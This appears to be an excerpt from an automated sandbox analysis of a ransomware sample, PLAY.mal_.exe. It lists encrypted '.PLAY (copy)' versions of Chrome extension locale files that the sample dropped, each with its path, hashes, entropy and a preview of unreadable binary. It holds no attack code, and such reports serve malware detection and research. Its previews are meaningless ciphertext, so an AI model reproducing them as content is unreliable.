        Preview:c .W...z.Z..3(x:.=?s..>.......$.....&.To.d_~m[{V..@|(.s...|......d.,$61J|..>f.:...Y.....P.|..t.[....Fm.E..g~..X.-.....J='..R.....X.y^zm......% 7..Hq.I.b....A0_.,j.v}8...H%.....DF.h.P.a.f.t..\S...|...h....D(:[..P...Ia)..y...O.....0....x?,...+. .M.w\Hc...8.....c..W.."q......l<M..K..N3.F.<"...p.......~o.3.../.L#.XpSn..........N@HR....+..."....uy.:y......b....S..]d.R.>......s...9[.N.....!..`.T(.6......r.F....n...UcO..z(...........w.D...7.....-v.6maM...K^.6.....6.A=j/-.......3..m.E-O.....[....G........BQ.9.i.t..E.O...+O...#...M..&..gy%.t.{4.q.Lb....CTM..i.../+...xC.%z.G........B......-QU..Edc...0.7..N.....J.EZ.z.......:!zi....0./...db>X..R4..RO..DE....9"....}Q...T..,...(...~f.......g5R..b..%.XV.4Itz...#....|....HB..W.U......T..U.|.!.I>..........................0n...k.c.aJ...N(.F...$.[.......<R5.........y.....{..S..... 4.A(.&...`...^i........o`.q....=.c....L|/.Aev^...f......?.."...i.4.P#......E.KU.d.y.*......eQ\d.2J.:.R.y.I@.8..[.....|.o.....4.R

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\pa\messages.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):3864
        Entropy (8bit):7.952800033298573
        Encrypted:false
        SSDEEP:
        MD5:AD94B1BEE18A6E011299624825B53766
        SHA1:3CCF777BC1D4ADEB6921A3763C9D0B80A06409AD
        SHA-256:8F58697288BC90831AA1FD632F5CDA1D57A261EDD6BB1D7D814E8789E45821BA
        SHA-512:F150B763880550E8C5E25D5367848649DD2393B2596EF6D7610C7397FDC14BB706D02A68B81AB25B3FC5E8DBABFAB7C393F2FB1CA6D0AE7E3457DBFBEBEB339A
        Malicious:false
        Preview:..(n..cR.sC...A`uO..ag.S..K..j...d..c..!...j.g?_R....b^.........T... ........fUo.|G.DHB-H...fW.".N..As.X.%.?.:-X.$.z.lQ.....u..>Gm&s.k...\.s..9r.yL6.0..A..F.;...E..}y.=m..`p5....6h:_....:.9>..S\h.)(:....7.9..'....;w7...IG..N?..7/..]....3..+......K.l.j..l......4....M.h.K..#...H..A.V.....4^x./.v#....FV....l.U:...=g....}N...<.rW.g.R.rV.iXC.[...w.0....LG..q/F?r....j..]K.7...xhg.n.2.;I..T$?..:.]....J..f.u.3z...n.s.d....*.(...v..wJ{..m.#....3=.t...j4{.b.QuR[[..pMe.F...T..1Ma(Z..kD.b~.0_...Q.....J...s.........."T...._{.>.}...WY.........D...RI...Z.9=.c..........A=...d._.?u...Pb.k.T.K}YjL.B.m.T...9\...:.p&J..F......8.p.r...e.+.........[E.C...5..H....R./.l.M ....kU1.....;@g. )....I..s-.)....-`.9...zJ.u...1..:+....n....1.Y..dsIB.CKJ.W.......`.....x...qPLc..:aB.<.$..%Ym.oU#o.}.r..S...=.V:.V;.YX...7....B>..=...:.}...%.V.L.............C0......?x../...J...)....Dg...`g.....Q..@...i...e.....HOmZV[. ....bP......i&r.....;'5.d.......4.M^....U

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\pl\messages.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2056
        Entropy (8bit):7.898237034948778
        Encrypted:false
        SSDEEP:
        MD5:007BE72560E3715A894F719E690ACF79
        SHA1:419CF57E656F68B0BB8D77AA079E556D15D4480F
        SHA-256:DAFC2F442D00305FDFD4608E79EC5E1FEBA005BE713223A44DA3709AAE893E68
        SHA-512:1512AAF45AB90C1397C4436A58DDD566C9180CADC1F074D0911CAAA3CBE0978E7B261DBF5B3C1048DC3D08B010E003FD14E0349B68553AEF26A87EC6B01F5DF9
        Malicious:false
        Preview:Q^.....`.........-......Z.0......!t.`...Z............`Y..O...\k.)...&.2.0;ac5/.A..!..\.....?...y.A.8W..._...k....................Z..+.S.g.~......)M......>\._};....C.7.U/.S...^..m.......*(.F.e.._......j>U...I....r%..Xd.A..R...!0.V........Q.bz._M/....U..Z7.../.S....9..j$... .4].....G}..>..'[)..S..Z..5...(....z..:..-...<. .q..N.f...v.B..\..=....g*T...a...=f.AR?.Er&i...U.....x) ..q...}..+Z'7KS8fvr.....@.R..>..L...1..Q.|.f..8...K.z.F>.f...........}..o...p....;....`.}...m.Q...W ........eHcl......5..$e...B..gfe.b.x.T"i"...*+=i~.NuPx.l.ny....,=5/....m.....1d.a9ru..<YN)...Uj.>.c....J@[..w'......YM.y.....{...MZK%x..4.....a.T.+...e....E....R..m.../|.$........k.r........Q.$..o...n.L-e..;.oP..ZA.....4.*..0R.........e..x...I....H}.......s..?.6...=..d.....;.....PO:.}..<.]..l............^...I...).\}N..V?..c.......V]D...H!.......$......<..g..y=..M.!7X!..).Q>j|S)..u....Q..-xq....&4...[..z..@.@..h.bYheKlB.!.VWU7........W1.......-....uW5..SCH..#.G..k.r..Q..x....T..U.

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\pt_BR\messages.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:PGP\011Secret Sub-key -
        Category:dropped
        Size (bytes):1976
        Entropy (8bit):7.8894245911517435
        Encrypted:false
        SSDEEP:
        MD5:CE2769025F107FBFA33478E21B4A84FD
        SHA1:C0F705D50C5DF4054CD933F3889ECFC48AA7BEF5
        SHA-256:FABD57222B0E8937EA18BDB12D10CFD541C600FF2D63C432A6C7E54A900E5A00
        SHA-512:BA1CEA7C6B44D720D0FD0DC666B72191B2DE6AD2EF3A9A7A0B4C61257CD17848088A99B4AE24CA3C48439D3926845BF6F458A0FA42825A02EF25AB84CF8CACAE
        Malicious:false
        Preview:..}9..`w.X.t[..mU..7....Q...!...#..p?....&...<...._..| .".k.r...]....n..O\~_..3G....24.c.k.F........N~d.!...^..;..Pg..m.)....>.>.72.CMD....N...5N=..Y....+`}.&....w..6K..$......@.TH@(.....y....A..6.fA.;....6.A......b%.....cx:...M}.|.b.b}0.].........f;.;.Vt.B..S...Z.SA...{/.K.\. ...Y..m./.........d.-|...O.r);.c.....:.......u.P...{.7..1:........... :*:.p3.../k.[....w.......@~.[Y...B .....rHs......pmT...*.]...GvW......#...@.s..g.....o15..B`.......xN..'.Ny.....h.!......U..P.T.....Z...e.. ro!.P.,e..Q.K.9..4.;~\.a....'A.Ji...)..x.$..]..j.g=..` ....W.G...H.... .=`.+....u.H.Z...9)....k..@P2...UW..??@i.P..E....Vli`..$.....<.a.Q..[d...r$K..C]...F.;....;.B..>......h9.....1..;j.y..C;...D*..a..(u.R[wD,..|....Ue.q.a..).C.E.......An8..#..$..9..Y.8.s. ...w...{....6.T.e....v..X_p.6ihIFY...P.^.P..&..e._....z.>.o.....S.{.#~G.*2t...6...~.....K..Fm..UY.U0..d.h....U...wB...T..U.|.!.I>..........................nv.`._....N.*..6.1..;Q...MV..E_|..R.X... F....

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\pt_PT\messages.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1992
        Entropy (8bit):7.894039299051002
        Encrypted:false
        SSDEEP:
        MD5:E56D495F1FF16AAA74147770205E9A02
        SHA1:6555111FDA0C154F77ADF81611D2848492E98341
        SHA-256:2FC8AFC0FA92C552A0CBCD1FF02B9970F6520E1F7330FBA072CD3963DEEC5D6A
        SHA-512:3D1A154864B716C6912A64A1F7F0704E0899AF33CAB2B5EFD2EACFC03C788453C2FAB438DCC45BC884ABF90B3CF115A3901655FED855193F2A14D1F105F891BD
        Malicious:false
        Preview:`y.]r....32.d.2lk.Y.......Gg`...}.,>%&..%..S<"4......<;.t.5....n..5fE..j^..G.J.:.....(XD...Q.)..4.q.C^..8...."M..[.M....m......P.:.8...mb....;.P^T.\23.M.T.+..e.....5]f.w.i.r."".`U@$^..E...U_...B..i{...i.'U.(W9^........i.Q........x<.5........%...<.h4R.....l....`8..z.....G...Zhz.+.k e.ch..^.U..V.S*].U]B..7;..l.....a"...U...l.f.4w..R.>..Y..."..n....1.......3j.Ea.z..a....r....hx.Y.....&..a0>..H..!......!a.r...2PspsY.G.3....oV.'.i..]]O-`&.+Aw...#.Z.@....0)l.....P..?o;..A.0....;...6.B....3.R.&...6U.F!r...=.2P.r.^.x..8..!.O.y....G.g....j.R...Q...%..7W.-...3@,...P...)./.E...Mi3.z!<..t.7%w..a.X.....mR.h#$..E..O.Q5..;c=.9.Ur.."G..1v....4Y$(d........k......9...%e_..7l.b3.N..#O..S....z.9f.s.l.7* .04.E8A......a..).<......_(q9P...$]..}....DW....*.yoY..7.$a..F...X.iI...#...[Q.o..8.....M....|.Ut:w...#S.}_.....D..4........... ...w..".0\.igp...w.0.....h.._..j.5}..Z|..G.....o.)..`.QS=.?(k4.(m5.^...T..U.|.!.I>..........................$MZ.$.7...jn......aa..9.f-z<...

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\ro\messages.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2024
        Entropy (8bit):7.892144967509385
        Encrypted:false
        SSDEEP:
        MD5:52A43048A4EFD22DC0A98B91878B29CE
        SHA1:7E499A2B918ED3B6E4C968FBAE369A3E07052A94
        SHA-256:D6DC3B6ECE38630A1365E53F72E8070C564B8A583B892A765E4EB0DA079FFBC8
        SHA-512:9A8E0C5A1EB6857845E1C2B7454F07E7A788B5AAA01516B48DCE36E2F64FC60679AF2C9DBB0FBF6C7B97B35E560ECCAA0A94F46A7FF5EEBBF3A13B0A8C8B7FE5
        Malicious:false
        Preview:.lp.@....-l......=...C.,.,...s....q. ....Z...........S..c.3..t..o..OZ../hI......7....b.bv..>...[..._u..~.pD.h.Eg...k$..h.J.URj...M<....^.Rtz...SC..0<.;..Z.d.....m...4...X\.>........dR.P.y...m.....z.......1(......K.P>f.).3.tp..I.LG...;).m+...bC.........=B.1,E.-..d}.c!....Nx.F..p..B..)...[*\.[....Gl.M.a...H}...p..e*8."4.... .ce..~.C..t....xP.17el..L].>N..l.gL.i....~..sq..4a7p..Ix?.......0..kM/.4..W.b6....7....-g.U.b..d.~.5P.\$.0......).k1....A.3..!...^v@J......)e@............-.m..Fc\..fl.r>.z.........\...,.XZ..O.Y.3.......C..V.Ae.....}Ay...To....h&..r.......U...?...#...Q.Y\.;.a..";.S...Kb7`.9M.rn}q.'.A....A.4...aN}....R.2.&..F..+E....!.,{.E..c.V.nQ....:UP.......l.D...M...<.P.\..0..=>.{..j.yW..k?......i.@.#MM._...}5....P.j...b.....j.....V.c@r=[j.>.Rv..H.3..:]+...K..S.7?....{.m..."..#.....b........{..9(<..M..3......L\.Ca.tUy.Q.>....4.X'.:...5p...x..T`$.g..&DG......-$.R.l....I..M..4k....Zf.hiX...O.v?4..}...T..U.|.!.I>..........................

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\ru\messages.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2408
        Entropy (8bit):7.907898480350156
        Encrypted:false
        SSDEEP:
        MD5:838CC1E520D6663FA8D9711C114DD0FA
        SHA1:5B27BA8446AA7594212611E0A1AAD96AE13FA54D
        SHA-256:6FF460B86BC36F9C38BC19DB954B7A78965F951A024D4223C15F699A87D4934E
        SHA-512:AE466325A971180818958BAE46F217305E89B94CEA5D016C9D8B25FFAB9E51A57265338728889B72AFE2EA5E0409E2E1FA36F9EF4EF9607D79850C3ED5F39325
        Malicious:false
        Preview:3..u...a..o.......J....a.....)'....*y.H.`....w.)$..7.Y.BDCY0.h.|cp@YRNH...kc<]J.K...:.........9.;...M.Nx.H{.J6..wS....,....?^H}..sV.I(..jvT/....(.<...{...w.,OuU:I....@.B..[..J..-8.vv.4......(....B...l..}B.vN..!'.jj^2..J..b...W...{.*.\j+.O..v..]..j..N..o'......W.Y...729...Lt%NQ|..'.b.E).'....>..ul....3.9...Cj..ev..Z.H..{..}+.[....lc.'3dM8..uIz.:..w..,..NjI.#...1.;y.).xZ..b...D...Y..N..2..b....ZYXdS.!...J.p..C.....=.Xj{3dc-.f.47..~@.%8..&7..B..=...(..>[;..1g..q?m%....h..$.........-$......v.$...b.....b'..2.EP.R.C..L.28:..l...\..... M....4./!.....?.S..h.....1..A.,7.%.-..j+U#F...WtQ:y.E..e\..U.....g.v......{.x.!.s?]e7.B.v...i.a...||.._.?]."U#.........{({...T.........~Lt.....dka.....~F..i..S%.}.I:..7.B.S...3;.....E0Fe'..p.....-...>.q.x-...V..\..K.\p.q~.A....d|}]...l...}..Ur...7....O...-...O.^....3....H..g=6....i..si..m.[. M....P.U.q%..|..p....{..].h.........Y.S+..3X.>|.....r..w3..6w.~..UqKA.U...]....E~.C..k.....r..KL[.&"..9\E.....g.H.V(R..B.:....

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\si\messages.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:PGP\011Secret Sub-key -
        Category:dropped
        Size (bytes):3912
        Entropy (8bit):7.9623442120626295
        Encrypted:false
        SSDEEP:
        MD5:CC85E4C93B96DB7B1FB1277D9FC7F27A
        SHA1:7A178FBF94F42A4BECA33AA98AD7BDF28979EAFF
        SHA-256:30D5D36AB027017A47AADCC314527541174E44D33B514E5FA200E32959F039F4
        SHA-512:860293038E761962A1E7FFF02AF68886A4BBFF2A720EA3B9E1B25BA74D4029DE98DB93A904A31A6CB2577EE5722BC777178A0B5D35CD20157265DAB147DCF744
        Malicious:false
        Preview:.+..6..jj...y...%E.C.{....A...:./...X..F.TN.w.P...`..G:....{c..W.F)..Yr.~8..7.V.Q..l.$.3........8.../)3B...j....*.....A..d4H.E..W_.-..i..jJ.F.!a~\..zgu............5..V..\g..3OW.Jr..il.MpB..%.....v....*J..B.....*...)..2....1.l..(..39C...#m...z\.8.....r.}.2\Ry.L..+=?.z.W....1..'rL...J../`..e...e.37.D".Z..VK....4..0. e..X...?.b......p^..h... .}."........Kl.o..U.n..a.h2.>..TD.W.{5NT. eT7..X......N....7.........- ....?....F...9.`B..e..^.B.....!....9.. ....fo.{...k@t.h.S5+.w....6.>c.l.~....2.'..HI'..+Ci".;....S.,........b]..<...m.Z......}.W..1.^.l#S....+.?2C........8Xs..D....`.M`.n..<.... .Q4....|U.........98.3...&c9.o..Xk....C...[<>nz..A.M..H3.qc....XM.y......\{..`...h..a.a.N....ar..q.....D._...x.L[FwO..5)..:.u...G..J.GQ.......YP..._.0....4.....h..VS...s..E....g..v..i,/.....g....{c..q..b..d.7...\..trOm".v../8.h.7.."v.v.Q..p-.3...K`m.Ry|.k.t@..........v....6t.[..k....I.y.d...>.gZ.....2.....n9.G..U3...._...5I.%...!WU..5_....V.}f%.g..>7...

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\sk\messages.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2008
        Entropy (8bit):7.892498473350344
        Encrypted:false
        SSDEEP:
        MD5:977213D9940F2B1969E0E031A33B7D07
        SHA1:43E4E2F68C31954F63C6A83826963EA7AA2A9AE2
        SHA-256:4BF53BDDEC4FDB5E1F4925307A355EA7D305F6D9D5C2321759B5736A09B134CA
        SHA-512:37202E52B58901C9B4510532A7F23261A15C7BCDDD3AADD6BD2A4912E1E6FC156BF869599E0EA463B45CC20D698CA6F551D2E3F4F0151F1E8AC51B94DAD614EC
        Malicious:false
        Preview:.b.5.....K.@.FC..LY....N...)C....A*...."...Z.&...L..b...`j.n.T..5..n.lA..)d.....0.&"...+ .+...<.E.o...G)~.UD..A...*.l..xe.;~So9..:.;H.c......i........w.....~.../ .$.i..u\..T.0.cJ.E..E|J.......p[.......?.C........V.UP.>..T.2...~..&....7.......|..?.N.....e..+.Hd.\.T.......wT...%.y).UqH+.6.......n...W3..[,E..0..z.....(q.4..h....c.6.U.'Z^.h26...a..>...,......1..tN.$^...N.....N..` f..AZ....]]...Mu.tT9C...Q..(...Z.[.1....C.?p(....g...E.>...`t.Y.5...E?...Y.].....'.Uj...|....h;.g...............'..+.@....{.~`!.}........W0._,:..a<...K..8../."@|.-w........#.!'....?.`..FI.\..C4....%....!A*..C.........+.m..u..Y.`L)..'...[.]...{..P...[...w..a2.p.. ..:Uo.+.-...:............F..Nz.R..Y._X..Gg9....F.c.......]i..'.....c!G.I@R...|..s'..Q.3=..9.Snn...H..!..B...H..C.q.hD`..}l....*.b...:../.....o...w...cu..p.[."{.[Z..F`...r.4...&5[..!..y....c,..._..~..1.,dN...DkN&Q...q..:^S.......)..'.......k.......T..U.|.!.I>............................v..\..U.h.6...

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\sl\messages.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2040
        Entropy (8bit):7.905593728361142
        Encrypted:false
        SSDEEP:
        MD5:AD30A384BAC9C2E2F50DE16328EC4E0A
        SHA1:94FAF9F4A411F3281346E0F8B7CB13AA52FCBF94
        SHA-256:64910F9FE10835BC1F2AF640CC77987A5E9AED8C35D7BDD309E9C20D6722ED19
        SHA-512:2D3E07F36CD4010056D3E213E035F476CBE9568F531FDA26F901413E3E0CB6D7AA10494E08BA326F6AFFB435AB7E0A1BC9CAABB163117790D93E7A923234BEF9
        Malicious:false
        Preview:6.z@#.N.......[.C/......f../...+..A8...x+0a^......6.z....$?..(.....O.4.q..Xd..._f.;..!rf$.."...E$..>...j..ToR.Z^.:}..),..m.\0..J.$@......"2j.-...'|.1.>.31...5...O.s.".[.G.u....0.........o1.5&.M.H.U3.]..r.Ql.g..../......x..1.ex.^.#...o....f. ...g..&X.x...`."|..z.....G.PzE..........nD._..A..WQ`)<JT...c..^.p.KhdF.*...E.'......a..SF....g...G.t......U.n......$.d...I........-.D".\<...........m....`."....cKl...q=...V...5..Jm..z..P.......\f.....pj.CC..T.....4~Sqp..d^Pb..{...r...29.h.^....6..8.i{....j...........-3..s.H.W.T.Hz.^..........<.....C..f0..t(...k....2Te.../..:...\>.......Kr3p...lT..|.sy./....$.%}.Vi$.6..i3...%..;.o.Q)..dIi0.....b....6..x...q.?.....H.F..$\KR=.BX.V....t.k..............I.C..X...z...k......-.a..zq...S.(qd.... ..'^..'vd.>'..7.C..~g..S......P*zgd..D..o1.(....u1.....l..[d.[..K..#.w#zc..F.......x..Z.(..U'.Y..|.....h.>.*I..j.";)5i...T.J5bA.LE.l........f.*......-Tm.....m...o0..o..9.v;f..K.`...\....v_....T..U.|.!.I>..........

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\sr\messages.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2392
        Entropy (8bit):7.916079789167883
        Encrypted:false
        SSDEEP:
        MD5:5ED39A8F554BB0AEB9D9A447AE41E5B3
        SHA1:12ED540E1234BD7E2BFE6E409DA8298A548DF504
        SHA-256:C75AED28335AD2670122F7DE33F6EC2D198BFF83075FEFF599D897656241C886
        SHA-512:700F6C2D6CC4FABCB432CD33A09711A8F184E24E1676B4374D4591727DD525278EF1FB32F3FD8815BDAFC131A59FD6D057802F4D9E7CFA1866726F9DFD6543EE
        Malicious:false
        Preview:.O..M..Q.Z..U..pbk..'..........6F.G............?..m.....a@.f..~.W.r"G.2(.@\..%.....6.(...-.'.Of#....i..G+......5O...*:.....pK.O.._......JI...l..qe...*......j.e...J...O...."\....B.."....GV.M.q)4u......./`O.v..g.=...!.1..Q=+..r..U.c...S".s.Gp@..:..JX..............&.1O..._d..n.#.X$f.........Kq.N(..I.4GG.%.U.(..+.....Dlx.K P.......\-m.C....>.....d..'...(B_.s...d..9...og.Sa.,.N....IG...E...?.....m#.B&...Dd...q...*.u..3T...GbH........2......21=..L.jf..b.|..2.....@d.....~..6.?.2.< !L8........UK........(.i&.=..u...P.GuJ....W...Y.."..[Q.%..Z.D0.r59J.&XI......[.v...*..I.B...6.....5..(...\.b.H...........(..4...e.HtU!..(l..........'"m..w:...O.=..?Ng.16.e^HM....0L.....wP.d..Mj...4<t..y.3.....,.J%A...G.Y_m..SW.%...Wj.6..0.....A._`s.S(4..l.......>.....dr..........Q&]p....0.B?../.a.sD....'.Q<..$.@.s.>..&.t......%.;1..=\.L;..H.Z......p.gu..|r$.....W..a..i..n.R.....!.c.;%.X...DEc.l..e. r.I...K.)..")<..r.&^8(w.9..;M.....c....1...m..U[.*.R..?.z.

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\sv\messages.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1960
        Entropy (8bit):7.9026801784339
        Encrypted:false
        SSDEEP:
        MD5:BCCD4EBCBC20C98CE604C24A65FD6E1D
        SHA1:0C8DAF21C7C255D2F956C30165DA6337EA36D3DB
        SHA-256:DC2EB83D8E324D9DAB4E637F92CA72C4C9A307BB15D8DDABD28ED7D57B210600
        SHA-512:AC53571554C3C338D28D023A4F58D00AC507F00256EF6B5E9534D3E37301AA6E67AEBDFBB72A7E127451D22BCDED9012CEE1EE3BB113DC4DD754870175423888
        Malicious:false
        Preview:.#....k.2j../.4.`.`Y....V...d..v..!a4.....DAI...+N^....dn.V.M.eh.......&mO...z..'j.....u.l+.....s....6.h).....X.F..79...R...I[4.....Z.z......pm....v._..d.....;.e9d...>.Z....$?.../>.>.ag...."..\..........Y^X..?..X.FQ....Z}I..C5g.....M.........h../z.S......2..\{gA..@..S....m...E'.0.BX.N45.N...N..e....Zp5uu.....A>..z....V....P.,....j.......K_;.....p...t~....4~.6(.|..n.x..,....S.3.......7,_?.........L..#g.J..n.7.._:)^...:..!...^mB.......i.c.....A..@4...V..A%..J.X%.v..,...}.U..5I..oe.Q;7.;.."...`.].|/..!.H$...H .)K.GM.........0..E.&Q......g.9{P.t|eZ..RP.....M......+U......x*YHr.....cz....|3i..........-.=..G%.`.|......:.....,....i...e.nr..x....[e.. .x......t..B..q"...[........Z.y..".R4.......x.....;.G..H....:.2.1..Q2.&eGO..../..}Q.....f....7..ym.....?..$Yg];.4L....;t.+.T..a0g:RF.....n..K`..W..t....7.].u.<j.5.`uN...Z...!.....H}QX.-.`...T..U.|.!.I>..........................Yc~.J.j`..e.4Ve_..$.Lq.'...(.!l..;..&.m.ue...u.t.FD.5.l.Io.....{

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\sw\messages.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2056
        Entropy (8bit):7.894092123946256
        Encrypted:false
        SSDEEP:
        MD5:DF396E0F2E443763E0F02351A68B8D4A
        SHA1:DED3BCC362801180624C6A095EA0FA79E993534F
        SHA-256:D20590F7CB1919FD48087651E2B0638F3C2686CDD219D60D163D1E3B26031FA4
        SHA-512:929D1F3E778B1BFA6DA5D31DD7F60CA03D04032A9AC967A50840BE1E533249DD74C94A0CF3B00E147FBB37ABCA431AC4BD2E5AC689EE2A47A752C18727F81C62
        Malicious:false
        Preview:....Q..t.,"..i.`M.......y.....i......G.....S..o9..4...Fq.O....}.%...W)..PT.kM)...aMK.L....sv.M..i.3\D.M.).v.P!v...........D....... .U&a_..a._<.V..b..X.uyr.Z..?&Ws...b.{I.zf=....u....FB.>\...v.1.E}.....Z.q..h]U......dB.o.euV.vU..NT..A"4.............2.`O.$........%.qg.S....:U>^.0..Ugo..O:&.Z/.|...6./-m.....(.w7.A[.w)\..`..."..J..N.d..w?..s.Q.V....y._.nV...r4...Y...n....9_...c.7...R......+G..$.%............h..J.cI..Y...-........Uel.Q..R..8.Qa..z..4A.U..G...LQ-U]..@..p..\L.I.;...tS..@vh.0vQ.@.<.}3W.....(...:...W...n[7....N....>.ax.R$.gx...va=..]..Z.G.OA_.)..n..M.=.....s.^.+.......CX{F..q.i?...=.........Q......l.^....ZEdMylT{.H....T...U..W[.sh2+.I..n@...2.L..KM...c....hN.....G.....o...b....m....Ys.HN.8..!.a.t3V..D..._@..t...L.c..J.Si.RQ.D.j..h*.B.`.R....qV.9.h.3.._...l<RO).mH.y....:....P.....[..}q...m..1.Z3..F..1.IK.........v.U<n.8..t...wJ..Cz...}......0.'/...gP}vYt..>.}..S...)9..D.iR..y....j2..;.'e.D..<.v1.....xg~m.^Kt...T..U.

